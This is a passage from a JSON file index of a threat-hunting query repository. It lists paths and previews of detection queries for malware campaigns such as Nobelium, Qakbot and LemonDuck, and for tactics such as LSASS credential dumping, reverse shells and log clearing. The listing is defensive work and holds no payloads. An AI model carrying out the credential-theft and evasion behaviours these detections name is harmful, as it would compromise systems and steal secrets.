"path": "Campaigns/Jupyter-Solarmaker/evasive-powershell-strings.md",
"chars": 1330,
"preview": "# Evasive PowerShell with uncommon read strings \n\nThis query searches for a string pattern detected in evasive PowerShel"
},
{
"path": "Campaigns/Jupyter-Solarmaker/successive-tk-domain-calls.md",
"chars": 1907,
"preview": "# Jupyter AKA SolarMarker\nJupyter, otherwise known as SolarMarker, is a malware family and cluster of components known f"
},
{
"path": "Campaigns/LemonDuck/LemonDuck-competition-killer.md",
"chars": 2212,
"preview": "# LemonDuck competition killer script execution\nLemonDuck is an actively updated and robust malware primarily known for "
},
{
"path": "Campaigns/LemonDuck/LemonDuck-component-download-structure.md",
"chars": 1944,
"preview": "# LemonDuck component download structure\nLemonDuck is an actively updated and robust malware primarily known for its bot"
},
{
"path": "Campaigns/LemonDuck/LemonDuck-component-names.md",
"chars": 1787,
"preview": "# LemonDuck common external component names\nLemonDuck is an actively updated and robust malware primarily known for its "
},
{
"path": "Campaigns/LemonDuck/LemonDuck-control-structure.md",
"chars": 1770,
"preview": "# LemonDuck command-and-control contact structure\nLemonDuck is an actively updated and robust malware primarily known fo"
},
{
"path": "Campaigns/LemonDuck/LemonDuck-defender-exclusions.md",
"chars": 2006,
"preview": "# LemonDuck Microsoft Defender drive exclusion tampering\nLemonDuck is an actively updated and robust malware primarily k"
},
{
"path": "Campaigns/LemonDuck/LemonDuck-email-subjects.md",
"chars": 1935,
"preview": "# LemonDuck Email Subjects\nLemonDuck is an actively updated and robust malware primarily known for its botnet and crypto"
},
{
"path": "Campaigns/LemonDuck/LemonDuck-id-generation.md",
"chars": 1808,
"preview": "# LemonDuck command-and-control ID generation\nLemonDuck is an actively updated and robust malware primarily known for it"
},
{
"path": "Campaigns/LemonDuck/LemonDuck-registration-function.md",
"chars": 1743,
"preview": "# LemonDuck botnet registration functions\nLemonDuck is an actively updated and robust malware primarily known for its bo"
},
{
"path": "Campaigns/Log4J/Alerts related to Log4j vulnerability.md",
"chars": 1788,
"preview": "# Alerts related to Log4j vulnerability\nMicrosoft has observed attackers exploiting vulnerabilities associated with Log4"
},
{
"path": "Campaigns/Log4J/Devices with Log4j vulnerability alerts and additional other alert related context.md",
"chars": 2345,
"preview": "# Devices with Log4j vulnerability alerts and additional other alert related context\nMicrosoft has observed threat actor"
},
{
"path": "Campaigns/Log4J/Suspicious JScript staging comment.md",
"chars": 1347,
"preview": "# Suspicious JScript staging comment\nMicrosoft has observed attackers who have gained entry to an environment via the Lo"
},
{
"path": "Campaigns/Log4J/Suspicious PowerShell curl flags.md",
"chars": 1547,
"preview": "# Suspicious PowerShell curl flags\nMicrosoft has observed attackers who have gained entry to an environment via the Log4"
},
{
"path": "Campaigns/Log4J/Suspicious process event creation from VMWare Horizon TomcatService.md",
"chars": 1446,
"preview": "# Suspicious process event creation from VMWare Horizon TomcatService\nMicrosoft has observed attackers who have gained e"
},
{
"path": "Campaigns/MacOceanLotusBackdoor.txt",
"chars": 364,
"preview": "// Backdoor processes associated with OceanLotus Mac Malware Backdoor\n// References:\n// https://blog.trendmicro.com/t"
},
{
"path": "Campaigns/MacOceanLotusDropper.txt",
"chars": 477,
"preview": "// Backdoor processes associated with OceanLotus Mac malware backdoor dropper\n// References:\n// https://blog.trendmic"
},
{
"path": "Campaigns/Macaw Ransomware/Disable Controlled Folders.md",
"chars": 1335,
"preview": "# Macaw ransomware - Disable Controlled Folders \nPrior to deploying Macaw ransomware in an organization, the adversary w"
},
{
"path": "Campaigns/Macaw Ransomware/Imminent Ransomware.md",
"chars": 3235,
"preview": "# Macaw ransomware - Imminent Ransomware \nDirectly prior to deploying Macaw ransomware in an organization, the attacker "
},
{
"path": "Campaigns/Macaw Ransomware/Inhibit recovery by disabling tools and functionality.md",
"chars": 1536,
"preview": "# Macaw ransomware - Inhibit recovery by disabling tools and functionality \nPrior to deploying Macaw ransomware in an or"
},
{
"path": "Campaigns/Macaw Ransomware/Mass account password change.md",
"chars": 1342,
"preview": "# Macaw ransomware - Mass account password change \nPrior to deploying Macaw ransomware in an organization, adversaries w"
},
{
"path": "Campaigns/Macaw Ransomware/PSExec Attrib commands.md",
"chars": 1352,
"preview": "# Macaw ransomware - PSExec Attrib commands \nPrior to deploying Macaw ransomware in an organization, adversaries wil use"
},
{
"path": "Campaigns/Macaw Ransomware/Use of MSBuild as LOLBin.md",
"chars": 1194,
"preview": "# Macaw Ransomware - Use of MSBuild.exe as a LOLBin\nPrior to deploying Macaw ransomware in an organization, the adversar"
},
{
"path": "Campaigns/OceanLotus registry activity.txt",
"chars": 920,
"preview": "// Original Sigma Rule: https://github.com/Neo23x0/sigma/blob/master/rules/apt/apt_oceanlotus_registry.yml\n// Questions "
},
{
"path": "Campaigns/Qakbot/Excel launching anomalous processes.md",
"chars": 1427,
"preview": "# Excel launching anomalous processes\n\n\n## Query\nUse this query to find Excel launching anomalous processes congruent wi"
},
{
"path": "Campaigns/Qakbot/General attempts to access local email store.md",
"chars": 1128,
"preview": "# General attempts to access local email store\n\n\n## Query\nUse this query to find attempts to access files in the local p"
},
{
"path": "Campaigns/Qakbot/Qakbot Craigslist Domains.md",
"chars": 1289,
"preview": "# Qakbot Craigslist Domains\nQakbot operators have been abusing the Craigslist messaging system to send malicious emails."
},
{
"path": "Campaigns/Qakbot/Qakbot email theft.md",
"chars": 1456,
"preview": "# Qakbot email theft\n\n\n## Query\nUse this query to find email stealing activities ran by Qakbot that will use “ping.exe -"
},
{
"path": "Campaigns/Qakbot/Qakbot reconnaissance activities.md",
"chars": 1590,
"preview": "# Qakbot reconnaissance activities\n\n\n## Query\nUse this query to find reconnaissance and beaconing activities after code "
},
{
"path": "Campaigns/Ransomware hits healthcare - Alternate Data Streams use.txt",
"chars": 485,
"preview": "// Find use of Alternate Data Streams (ADS) for anti-forensic purposes.\r\n// Alternate Data Streams execution \r\nDevicePro"
},
{
"path": "Campaigns/Ransomware hits healthcare - Backup deletion.txt",
"chars": 184,
"preview": "// List alerts flagging attempts to delete backup files\r\n AlertInfo \r\n| where Timestamp > ago(7d) \r\n| where Title == \"F"
},
{
"path": "Campaigns/Ransomware hits healthcare - Cipher.exe tool deleting data.txt",
"chars": 506,
"preview": "// Look for cipher.exe deleting data from multiple drives. \r\n// This is often performed as an anti-forensic measure pri"
},
{
"path": "Campaigns/Ransomware hits healthcare - Clearing of system logs.txt",
"chars": 267,
"preview": "// Look for attempts to use fsutil.exe to delete file system logs that can be used as forensic artifacts.\r\nDeviceProces"
},
{
"path": "Campaigns/Ransomware hits healthcare - Possible compromised accounts.txt",
"chars": 1068,
"preview": "// Identify accounts that have logged on to affected endpoints\r\n// Check for specific alerts\r\nAlertInfo \r\n| where Timest"
},
{
"path": "Campaigns/Ransomware hits healthcare - Robbinhood activity.txt",
"chars": 341,
"preview": "// Find distinct evasion and execution activities \r\n// associated with the Robbinhood ransomware campaign.\r\nDeviceProces"
},
{
"path": "Campaigns/Ransomware hits healthcare - Turning off System Restore.txt",
"chars": 558,
"preview": "// Find attempts to stop System Restore and \r\n// prevent the system from creating restore points\r\nDeviceProcessEvents \r"
},
{
"path": "Campaigns/Ransomware hits healthcare - Vulnerable Gigabyte drivers.txt",
"chars": 299,
"preview": "// Locate vulnerable Gigabyte drivers used by RobbinHood ransomware to turn off security tools\r\nDeviceFileEvents \r\n| wh"
},
{
"path": "Campaigns/StrRAT malware/StrRAT-AV-Discovery.md",
"chars": 1580,
"preview": "# StrRAT Malware AV Discovery\nStrRAT is a Java-based remote access tool which steals browser credentials, logs keystroke"
},
{
"path": "Campaigns/StrRAT malware/StrRAT-Email-Delivery.md",
"chars": 1740,
"preview": "# StrRAT Malware Email Delivery \nStrRAT is a Java-based remote access tool which steals browser credentials, logs keystr"
},
{
"path": "Campaigns/StrRAT malware/StrRAT-Malware-Persistence.md",
"chars": 1500,
"preview": "# StrRAT Malware Persistence\nStrRAT is a Java-based remote access tool which steals browser credentials, logs keystrokes"
},
{
"path": "Campaigns/Sysrv-botnet/app-armor-stopped.md",
"chars": 1208,
"preview": "# AppArmor service stopped\n\nThis query was originally published in the threat analytics report, *Sysrv botnet evolution*"
},
{
"path": "Campaigns/Sysrv-botnet/java-executing-cmd-to-run-powershell.md",
"chars": 1314,
"preview": "# Java process executing command line to download and execute PowerShell script\n\nThis query was originally published in "
},
{
"path": "Campaigns/Sysrv-botnet/kinsing-miner-download.md",
"chars": 1146,
"preview": "# Kinsing miner download\n\nThis query was originally published in the threat analytics report, *Sysrv botnet evolution*.\n"
},
{
"path": "Campaigns/Sysrv-botnet/oracle-webLogic-executing-powershell.md",
"chars": 1298,
"preview": "# Oracle WebLogic process wlsvcX64.exe exploitation and execution of PowerShell script to download payloads\n\nThis query "
},
{
"path": "Campaigns/Sysrv-botnet/rce-on-vulnerable-server.md",
"chars": 1201,
"preview": "# Remote code execution on vulnerable server\n\nThis query was originally published in the threat analytics report, *Sysrv"
},
{
"path": "Campaigns/Sysrv-botnet/tomcat-8-executing-powershell.md",
"chars": 1444,
"preview": "# Tomcat 8 process executing PowerShell command line to perform data exploitation activities and setting up scheduler ta"
},
{
"path": "Campaigns/Threat actor Phosphorus masquerading as conference organizers.md",
"chars": 2636,
"preview": "# Threat actor Phosphorus masquerading as conference organizers\n\nIdentify prior activity from this campaign using IOCs s"
},
{
"path": "Campaigns/WastedLocker Downloader.md",
"chars": 1243,
"preview": "# WastedLocker Downloader\n\nThis query identifies the launch pattern associated with wastedlocker ransomware.\nReference w"
},
{
"path": "Campaigns/ZLoader/Malicious bat file.md",
"chars": 1227,
"preview": "# Malicious .bat file in suspicious Oracle Java SE folder path\nZLoader was delivered in a campaign in late summer 2021. "
},
{
"path": "Campaigns/ZLoader/Payload Delivery.md",
"chars": 1204,
"preview": "# Tim.exe payload delivery\nZLoader was delivered in a campaign in summer 2021 via malvertising. This campaign was tweete"
},
{
"path": "Campaigns/ZLoader/Suspicious Registry Keys.md",
"chars": 1298,
"preview": "# Suspicious Registry Keys\nZLoader was delivered in a campaign in late summer 2021 using malvertising to download malici"
},
{
"path": "Campaigns/apt sofacy zebrocy.txt",
"chars": 292,
"preview": "// Original Sigma Rule: https://github.com/Neo23x0/sigma/blob/master/rules/apt/apt_sofacy_zebrocy.yml\n// Questions via T"
},
{
"path": "Campaigns/apt sofacy.txt",
"chars": 369,
"preview": "// Original Sigma Rule: https://github.com/Neo23x0/sigma/blob/master/rules/apt/apt_sofacy.yml\n// Questions via Twitter: "
},
{
"path": "Campaigns/apt ta17 293a ps.txt",
"chars": 272,
"preview": "// Original Sigma Rule: https://github.com/Neo23x0/sigma/blob/master/rules/apt/apt_ta17_293a_ps.yml\n// Questions via Twi"
},
{
"path": "Campaigns/apt tropictrooper.txt",
"chars": 308,
"preview": "// Original Sigma Rule: https://github.com/Neo23x0/sigma/blob/master/rules/apt/apt_tropictrooper.yml\n// Questions via Tw"
},
{
"path": "Campaigns/apt unidentified nov 18.txt",
"chars": 409,
"preview": "// Original Sigma Rule: https://github.com/Neo23x0/sigma/blob/master/rules/apt/apt_unidentified_nov_18.yml\n// Questions "
},
{
"path": "Campaigns/c2-lookup-from-nonbrowser[Nobelium].md",
"chars": 5518,
"preview": "# Locate Nobelium implant receiving DNS response\n\nThis query was originally published in the threat analytics report, *S"
},
{
"path": "Campaigns/c2-lookup-response[Nobelium].md",
"chars": 5526,
"preview": "# Locate Nobelium implant receiving DNS response\n\nThis query was originally published in the threat analytics report, *S"
},
{
"path": "Campaigns/cobalt-strike-invoked-w-wmi.md",
"chars": 3009,
"preview": "# Detect Cobalt Strike invoked via WMI\n\nThis query was originally published in the threat analytics report, *Ryuk ransom"
},
{
"path": "Campaigns/compromised-certificate[Nobelium].md",
"chars": 4761,
"preview": "# Compromised certificate [Nobelium]\n\nSearch for the files that are using a compromised certificate associated with the "
},
{
"path": "Campaigns/confluence-weblogic-targeted.md",
"chars": 3669,
"preview": "# Confluence and WebLogic servers targeted by campaign\n\nThis query was originally published in the threat analytics repo"
},
{
"path": "Campaigns/cypherpunk-exclusive-commands.md",
"chars": 1405,
"preview": "# Cypherpunk remote execution through PSEXESVC\n\nThis query was originally published in the threat analytics report, *Cyp"
},
{
"path": "Campaigns/cypherpunk-remote-exec-w-psexesvc.md",
"chars": 1712,
"preview": "# Cypherpunk remote execution through PSEXESVC\n\nThis query was originally published in the threat analytics report, *Cyp"
},
{
"path": "Campaigns/detect-cyzfc-activity.md",
"chars": 3005,
"preview": "# Detect activity associated with malicious DLL, cyzfc.dat\n\nThese queries was originally published in the threat analyti"
},
{
"path": "Campaigns/fireeye-red-team-tools-CVEs [Nobelium].md",
"chars": 5983,
"preview": "# FireEye Red Team tool CVEs [Nobelium]\n\nSearch for the CVEs that should be prioritized and resolved to reduce the succe"
},
{
"path": "Campaigns/fireeye-red-team-tools-HASHs [Nobelium].md",
"chars": 19413,
"preview": "# FireEye Red Team tool HASHs [Nobelium]\n\nThis query searches for the HASHs of the FireEye Red Team tools compromised by"
},
{
"path": "Campaigns/known-affected-software-orion[Nobelium].md",
"chars": 5346,
"preview": "# View data on software identified as affected by Nobelium campaign\n\nThis query was originally published in the threat a"
},
{
"path": "Campaigns/launching-base64-powershell[Nobelium].md",
"chars": 5873,
"preview": "# Locate SolarWinds processes launching suspicious PowerShell commands\n\nThis query was originally published in the threa"
},
{
"path": "Campaigns/launching-cmd-echo[Nobelium].md",
"chars": 5600,
"preview": "# Locate SolarWinds processes launching command prompt with the echo command\n\nThis query was originally published in the"
},
{
"path": "Campaigns/locate-dll-created-locally[Nobelium].md",
"chars": 7055,
"preview": "# Locate Nobelium-related malicious DLLs created in the system or locally\n\nThis query was originally published in the th"
},
{
"path": "Campaigns/locate-dll-loaded-in-memory[Nobelium].md",
"chars": 7059,
"preview": "# Locate Nobelium-related malicious DLLs loaded in memory\n\nThis query was originally published in the threat analytics r"
},
{
"path": "Campaigns/oceanlotus-apt32-files.md",
"chars": 5225,
"preview": "# Detect malicious documents associated with group known as \"OceanLotus\"\n\nThis query was originally published in a threa"
},
{
"path": "Campaigns/oceanlotus-apt32-network.md",
"chars": 1790,
"preview": "# Detect malicious network activity associated with group known as \"OceanLotus\"\n\nThis query was originally published in "
},
{
"path": "Campaigns/possible-affected-software-orion[Nobelium].md",
"chars": 5502,
"preview": "# Get an inventory of SolarWinds Orion software possibly affected by Nobelium\n\nThis query was originally published in th"
},
{
"path": "Campaigns/robbinhood-driver.md",
"chars": 2228,
"preview": "# Detect loading of vulnerable drivers by Robbinhood ransomware campaign\n\nThis query was originally published in the thr"
},
{
"path": "Campaigns/robbinhood-evasion.md",
"chars": 2225,
"preview": "# Detect security evasion related to the Robbinhood ransomware campaign\n\nThis query was originally published in the thre"
},
{
"path": "Campaigns/snip3-aviation-targeting-emails.md",
"chars": 2142,
"preview": "# Detect keywords associated with Snip3 campaign emails\n\nSnip3 is a family of related remote access trojans. Although th"
},
{
"path": "Campaigns/snip3-detectsanboxie-function-call.md",
"chars": 1664,
"preview": "# Detect Snip3 loader call to DetectSandboxie function\n\nSnip3 is a family of related remote access trojans. Although the"
},
{
"path": "Campaigns/snip3-encoded-powershell-structure.md",
"chars": 1709,
"preview": "# Detect Snip3 loader-encoded PowerShell command\n\nSnip3 is a family of related remote access trojans. Although the malwa"
},
{
"path": "Campaigns/snip3-malicious-network-connectivity.md",
"chars": 1724,
"preview": "# Detect malicious use of RegAsm, RegSvcs, and InstallUtil by Snip3\n\nSnip3 is a family of related remote access trojans."
},
{
"path": "Campaigns/snip3-revengerat-c2-exfiltration.md",
"chars": 1636,
"preview": "# Detect Snip3 associated communication protocols\n\nSnip3 is a family of related remote access trojans. Although the malw"
},
{
"path": "Collection/Anomaly of MailItemAccess by Other Users Mailbox [Nobelium].md",
"chars": 7241,
"preview": "# Anomalous use of MailItemAccess on other users' mailboxes [Nobelium]\n\nThis query looks for users accessing multiple ot"
},
{
"path": "Collection/HostExportingMailboxAndRemovingExport[Solarigate].md",
"chars": 2596,
"preview": "# Host Exporting Mailbox and Removing Export\nThis hunting query looks for hosts exporting a mailbox from an on-prem Exc"
},
{
"path": "Collection/MailItemsAccessedTimeSeries[Solarigate].md",
"chars": 3434,
"preview": "# Host Exporting Mailbox and Removing Export\nIdentifies anomalous increases in Exchange mail items accessed operations."
},
{
"path": "Command and Control/C2-NamedPipe.md",
"chars": 6757,
"preview": "# Detects malicious SMB Named Pipes (used by common C2 frameworks)\n\nDetects the creation of a [named pipe](https://docs."
},
{
"path": "Command and Control/Connection to Rare DNS Hosts.md",
"chars": 2434,
"preview": "# Connection to Rare DNS Hosts\n\nThis query will break down hostnames into their second and third level domain parts and "
},
{
"path": "Command and Control/DNSPattern [Nobelium].md",
"chars": 6864,
"preview": "# Nobelium campaign DNS pattern\n\nThis query looks for the DGA pattern of the domain associated with the Nobelium campaig"
},
{
"path": "Command and Control/Device network events w low count FQDN.txt",
"chars": 1140,
"preview": "////////////////////////////////////////////////////////////////////////////////////\n// Device Network Events Involving "
},
{
"path": "Command and Control/EncodedDomainURL [Nobelium].md",
"chars": 7648,
"preview": "# Nobelium encoded domain in URL\n\nLooks for a logon domain in the Azure AD logs, encoded with the same DGA encoding use"
},
{
"path": "Command and Control/Tor.txt",
"chars": 959,
"preview": "// This query looks for Tor client, or for a common Tor plugin called Meek.\n// We query for active Tor connections, but "
},
{
"path": "Command and Control/c2-bluekeep.md",
"chars": 2800,
"preview": "# Detect command-and-control communication related to BlueKeep cryptomining\n\nThis query was originally published in the "
},
{
"path": "Command and Control/check-for-shadowhammer-activity-download-domain.md",
"chars": 1611,
"preview": "# Check for ShadowHammer-related download activity\n\nThis query was originally published in the threat analytics report, "
},
{
"path": "Command and Control/python-use-by-ransomware-macos.md",
"chars": 1864,
"preview": "# Python usage associated with ransomware on macOS\n\nThis query was originally published in the threat analytics report, "
},
{
"path": "Command and Control/recon-with-rundll.md",
"chars": 2179,
"preview": "# Detect rundll.exe being used for reconnaissance and command-and-control\n\nThis query was originally published in the th"
},
{
"path": "Command and Control/reverse-shell-ransomware-macos.md",
"chars": 1789,
"preview": "# Reverse shell associated with ransomware on macOS\n\nThis query was originally published in the threat analytics report,"
},
{
"path": "Credential Access/Active Directory Sensitive Group Modifications.md",
"chars": 3573,
"preview": "# Active Directory Sensitive/Tier 0 Group Modifications\nThis query shows all modifications to highly sensitive active di"
},
{
"path": "Credential Access/Private Key Files.txt",
"chars": 1048,
"preview": "/////////////////////////////////////////////////////////\n// Private Key Files\n//\n// This query identifies file operatio"
},
{
"path": "Credential Access/cobalt-strike.md",
"chars": 3433,
"preview": "# Find user accounts potentially affected by Cobalt Strike\n\nThis query was originally published in the threat analytics "
},
{
"path": "Credential Access/doppelpaymer-procdump.md",
"chars": 2756,
"preview": "# Detect DoppelPaymer operators dumping credentials with ProcDump\n\nThis query was originally published in the threat ana"
},
{
"path": "Credential Access/identify-accounts-logged-on-to-endpoints-affected-by-cobalt-strike.md",
"chars": 2903,
"preview": "\n# Identify accounts that have logged on to endpoints affected by Cobalt Strike\n\nThis query was originally published in "
},
{
"path": "Credential Access/lazagne.md",
"chars": 2499,
"preview": "# Detect credential theft via SAM database export by LaZagne\n\nThis query was originally published in the threat analytic"
},
{
"path": "Credential Access/logon-attempts-after-malicious-email.md",
"chars": 1581,
"preview": "\n# Logon attempts after receipt of malicious email\n\nThis query finds the 10 latest logons performed by email recipients "
},
{
"path": "Credential Access/procdump-lsass-credentials.md",
"chars": 3105,
"preview": "# Procdump dumping LSASS credentials\n\nThis query was originally published in the threat analytics report, \"Exchange Serv"
},
{
"path": "Credential Access/wadhrama-credential-dump.md",
"chars": 1972,
"preview": "# Image File Execution Options and .bat file usage in association with Wadhrama ransomware\n\nThis query was originally pu"
},
{
"path": "Credential Access/wdigest-caching.md",
"chars": 2530,
"preview": "# Credential harvesting through WDigest cache\n\nThis query was originally published in the threat analytics report, *WDig"
},
{
"path": "Defense evasion/ADFSDomainTrustMods[Nobelium].md",
"chars": 6707,
"preview": "# Domain federation trust settings modified\n\nThis query will find when federation trust settings are changed for a domai"
},
{
"path": "Defense evasion/Discovering potentially tampered devices [Nobelium].md",
"chars": 6429,
"preview": "# Discovering potentially tampered devices [Nobelium]\n\nTo evade security software and analyst tools, Nobelium malware en"
},
{
"path": "Defense evasion/MailPermissionsAddedToApplication[Nobelium].md",
"chars": 6665,
"preview": "# Mail.Read or Mail.ReadWrite permissions added to OAuth application\n\nThis query will find applications that have been g"
},
{
"path": "Defense evasion/PotentialMicrosoftDefenderTampering[Solarigate].md",
"chars": 3260,
"preview": "# Potential Microsoft Defender services tampering\nIdentifies potential service tampering related to Microsoft Defender "
},
{
"path": "Defense evasion/UpdateStsRefreshToken[Solorigate].md",
"chars": 2532,
"preview": "# Security Token Service (STS) refresh token modifications\nThis will show Active Directory Security Token Service (STS) "
},
{
"path": "Defense evasion/alt-data-streams.md",
"chars": 2253,
"preview": "# Detect use of Alternate Data Streams\n\nThis query was originally published in the threat analytics report, *Ransomware "
},
{
"path": "Defense evasion/clear-system-logs.md",
"chars": 1833,
"preview": "# Detect clearing of system logs\n\nThis query was originally published in the threat analytics report, *Ransomware contin"
},
{
"path": "Defense evasion/deleting-data-w-cipher-tool.md",
"chars": 2054,
"preview": "# Detect cipher.exe deleting data\n\nThis query was originally published in the threat analytics report, *Ransomware conti"
},
{
"path": "Defense evasion/doppelpaymer-stop-services.md",
"chars": 2326,
"preview": "# Detect DoppelPaymer operators stopping services\n\nThis query was originally published in the threat analytics report, *"
},
{
"path": "Defense evasion/hiding-java-class-file.md",
"chars": 1700,
"preview": "# Hiding a Java class file\n\nThis query was originally published in the threat analytics report, *Adwind utilizes Java fo"
},
{
"path": "Defense evasion/locate-files-possibly-signed-by-fraudulent-ecc-certificates.md",
"chars": 2070,
"preview": "# Locate files possibly signed by fraudulent ECC certificates\n\nThis query was originally published in the threat analyti"
},
{
"path": "Defense evasion/qakbot-campaign-process-injection.md",
"chars": 2195,
"preview": "# Process injection by Qakbot malware\n\nThis query was originally published in the threat analytics report, *Qakbot bligh"
},
{
"path": "Defense evasion/qakbot-campaign-self-deletion.md",
"chars": 2294,
"preview": "# Self-deletion by Qakbot malware\n\nThis query was originally published in the threat analytics report, *Qakbot blight li"
},
{
"path": "Delivery/Doc attachment with link to download.txt",
"chars": 3634,
"preview": "// This query looks for a Word document attachment, from which a link was clicked, and after which there was a browser d"
},
{
"path": "Delivery/Dropbox downloads linked from other site.txt",
"chars": 732,
"preview": "// This query looks for user content downloads from dropbox that originate from a link/redirect from a 3rd party site.\n/"
},
{
"path": "Delivery/Email link + download + SmartScreen warning.txt",
"chars": 2388,
"preview": "// Look for links opened from outlook.exe, followed by a browser download and then a SmartScreen app warning that was ig"
},
{
"path": "Delivery/Gootkit-malware.md",
"chars": 1907,
"preview": "# Gootkit malware delivery and C2\n\nThis query was originally published on Twitter, by [@MsftSecIntel](https://twitter.co"
},
{
"path": "Delivery/Open email link.txt",
"chars": 5494,
"preview": "// Query for links opened from mail apps – if a detection occurred right afterwards.\n// As there are many links opened f"
},
{
"path": "Delivery/Pivot from detections to related downloads.txt",
"chars": 2348,
"preview": "// Pivot from downloads detected by Windows Defender Antivirus to other files downloaded from the same sites\n// To learn"
},
{
"path": "Delivery/Qakbot Craigslist Domains.md",
"chars": 1289,
"preview": "# Qakbot Craigslist Domains\nQakbot operators have been abusing the Craigslist messaging system to send malicious emails."
},
{
"path": "Delivery/detect-jscript-file-creation.md",
"chars": 1757,
"preview": "# Detect .jse file creation events\n\nThis query was originally published in the threat analytics report, *Emulation-evadi"
},
{
"path": "Delivery/powercat-download.md",
"chars": 2983,
"preview": "# Powercat exploitation tool downloaded\n\nThis query was originally published in the threat analytics report, \"Exchange S"
},
{
"path": "Discovery/Detect-Not-Active-AD-User-Accounts.md",
"chars": 1339,
"preview": "\n# Detect not active AD user accounts \n\n// Detect Active Directory service accounts that are not active because their la"
},
{
"path": "Discovery/DetectTorRelayConnectivity.md",
"chars": 1885,
"preview": "# Detect Tor Relay Connectivity\nThis advanced hunting query detects processes communicating with known Tor relay IP addr"
},
{
"path": "Discovery/DetectTorrentUse.txt",
"chars": 495,
"preview": "//Custom detection to find use of torrenting software or browsing related to torrents\nDeviceNetworkEvents \n| where Times"
},
{
"path": "Discovery/Discover hosts doing possible network scans.txt",
"chars": 761,
"preview": "// Looking for high volume queries against a given RemoteIP, per DeviceName, RemotePort and Process\n// Please change the"
},
{
"path": "Discovery/Enumeration of users & groups for lateral movement.txt",
"chars": 656,
"preview": "// The query finds attempts to list users or groups using Net commands\r\nDeviceProcessEvents \r\n| where Timestamp > ago(14"
},
{
"path": "Discovery/MultipleLdaps.md",
"chars": 1622,
"preview": "# Detect multiple LDAP queries\r\n\r\nDetect multiple Active Directory LDAP queries made in bin time\r\n\r\nReplace 10 on line 1"
},
{
"path": "Discovery/MultipleSensitiveLdaps.md",
"chars": 2717,
"preview": "# Detect multiple sensitive LDAP queries\r\n\r\nDetect multiple sensitive Active Directory LDAP queries made in bin time\r\n\r\n"
},
{
"path": "Discovery/PasswordSearch.md",
"chars": 1905,
"preview": "# Detect LDAP queries that search for user password in description or comment\r\n\r\nDetect Active Directory LDAP queries th"
},
{
"path": "Discovery/PrevalentInteractiveLogons",
"chars": 553,
"preview": "// Breaks down the top interactive logged on user for each machine.\n// you can look for a specific user by using the lin"
},
{
"path": "Discovery/Roasting.md",
"chars": 2765,
"preview": "# Detect LDAP queries that search for accounts vulnerable for roasting attacks\r\n\r\nDetect Active Directory LDAP queries t"
},
{
"path": "Discovery/SMB shares discovery.txt",
"chars": 1030,
"preview": "// Query for processes that accessed more than 10 IP addresses over port 445 (SMB) - possibly scanning for network share"
},
{
"path": "Discovery/SensitiveLdaps.md",
"chars": 1672,
"preview": "# Detect LDAP queries for sensitive objects\r\n\r\nDetect Active Directory LDAP queries that search for sensitive objects in"
},
{
"path": "Discovery/SuspiciousEnumerationUsingAdfind[Nobelium].md",
"chars": 6489,
"preview": "# Suspicious enumeration using Adfind tool\n\nAttackers can use Adfind which is administrative tool to gather information "
},
{
"path": "Discovery/URL Detection.txt",
"chars": 621,
"preview": "// This query finds network communication to specific URL\n// Please note that in line #7 it filters RemoteUrl using has "
},
{
"path": "Discovery/VulnComputers.md",
"chars": 1814,
"preview": "# Detect LDAP queries that search for computer operating system\r\n\r\nDetect Active Directory LDAP queries that try to find"
},
{
"path": "Discovery/detect-nbtscan-activity.md",
"chars": 2083,
"preview": "# Detect nbtscan activity\n\nThis query was originally published in the threat analytics report, *Operation Soft Cell*.\n\n["
},
{
"path": "Discovery/detect-suspicious-commands-initiated-by-web-server-processes.md",
"chars": 2647,
"preview": "# Detect suspicious commands initiated by web server processes\n\nThis query was originally published in the threat analyt"
},
{
"path": "Discovery/doppelpaymer.md",
"chars": 2658,
"preview": "# Detect DoppelPaymer performing reconnaissance with net.exe\n\nThis query was originally published in the threat analytic"
},
{
"path": "Discovery/qakbot-campaign-esentutl.md",
"chars": 2227,
"preview": "# Browser cookie theft by campaigns using Qakbot malware\n\nThis query was originally published in the threat analytics re"
},
{
"path": "Discovery/qakbot-campaign-outlook.md",
"chars": 2154,
"preview": "# Outlook email access by campaigns using Qakbot malware\n\nThis query was originally published in the threat analytics re"
},
{
"path": "Email Queries/Appspot Phishing Abuse.md",
"chars": 1994,
"preview": "# Appspot Phishing Abuse\nThis query helps surface phishing campaigns associated with Appspot abuse. These emails frequen"
},
{
"path": "Email Queries/JNLP-File-Attachment.md",
"chars": 1023,
"preview": "## JNLP File Attachments\nJNLP file extensions are an uncommon file type often used to deliver malware. \n\n## Query\nThis q"
},
{
"path": "Email Queries/PhishingEmailUrlRedirector.md",
"chars": 1878,
"preview": "# Phishing email URL redirection\n\nThis query was originally published on Twitter, by [@MsftSecIntel](https://twitter.com"
},
{
"path": "Email Queries/referral-phish-emails.md",
"chars": 2182,
"preview": "# Referral infrastructure credential phishing emails\nThe \"Referral\" infrastructure is a point-in-time set of infrastruct"
},
{
"path": "Execution/Base64 Detector and Decoder.md",
"chars": 1366,
"preview": "# Base64 Detector and Decoder\n\nThis query will identify strings in process command lines which match Base64 encoding for"
},
{
"path": "Execution/Base64encodePEFile.txt",
"chars": 236,
"preview": "// Finding base64 encoded PE files header seen in the command line parameters\n// Tags: #fileLess #powershell\nDeviceProc"
},
{
"path": "Execution/Detect Encoded Powershell.md",
"chars": 1377,
"preview": "# Detect Encoded PowerShell\n\nThis query will detect encoded powershell based on the parameters passed during process cre"
},
{
"path": "Execution/Detect PowerShell v2 Downgrade.md",
"chars": 1667,
"preview": "# Detect PowerShell Downgrade\nThis query looks for processes that load an older version of the system.management.automat"
},
{
"path": "Execution/ExecuteBase64DecodedPayload.txt",
"chars": 806,
"preview": "// Process executed from binary hidden in Base64 encoded file. Encoding malicious software is a \n// technique to obfusc"
},
{
"path": "Execution/File Copy and Execution.md",
"chars": 1993,
"preview": "# File Copy and Execution\nThis query identifies files that are copied to a device over SMB, then executed within a\nspeci"
},
{
"path": "Execution/Malware_In_recyclebin.txt",
"chars": 501,
"preview": "// Finding attackers hiding malware in the recycle bin.\n// Read more here: https://azure.microsoft.com/en-us/blog/how-az"
},
{
"path": "Execution/Masquerading system executable.txt",
"chars": 1603,
"preview": "//Finds legitimate system32 or syswow64 executables being run under a different name and in a different location\r\n//The "
},
{
"path": "Execution/Possible Ransomware Related Destruction Activity.md",
"chars": 2765,
"preview": "# Possible Ransomware Related Destruction Activity\n\nThis query identifies common processes run by ransomware\nmalware to "
},
{
"path": "Execution/PowerShell downloads.txt",
"chars": 657,
"preview": "// Finds PowerShell execution events that could involve a download.\r\nDeviceProcessEvents\r\n| where Timestamp > ago(7d)\r\n|"
},
{
"path": "Execution/PowershellCommand - uncommon commands on machine.txt",
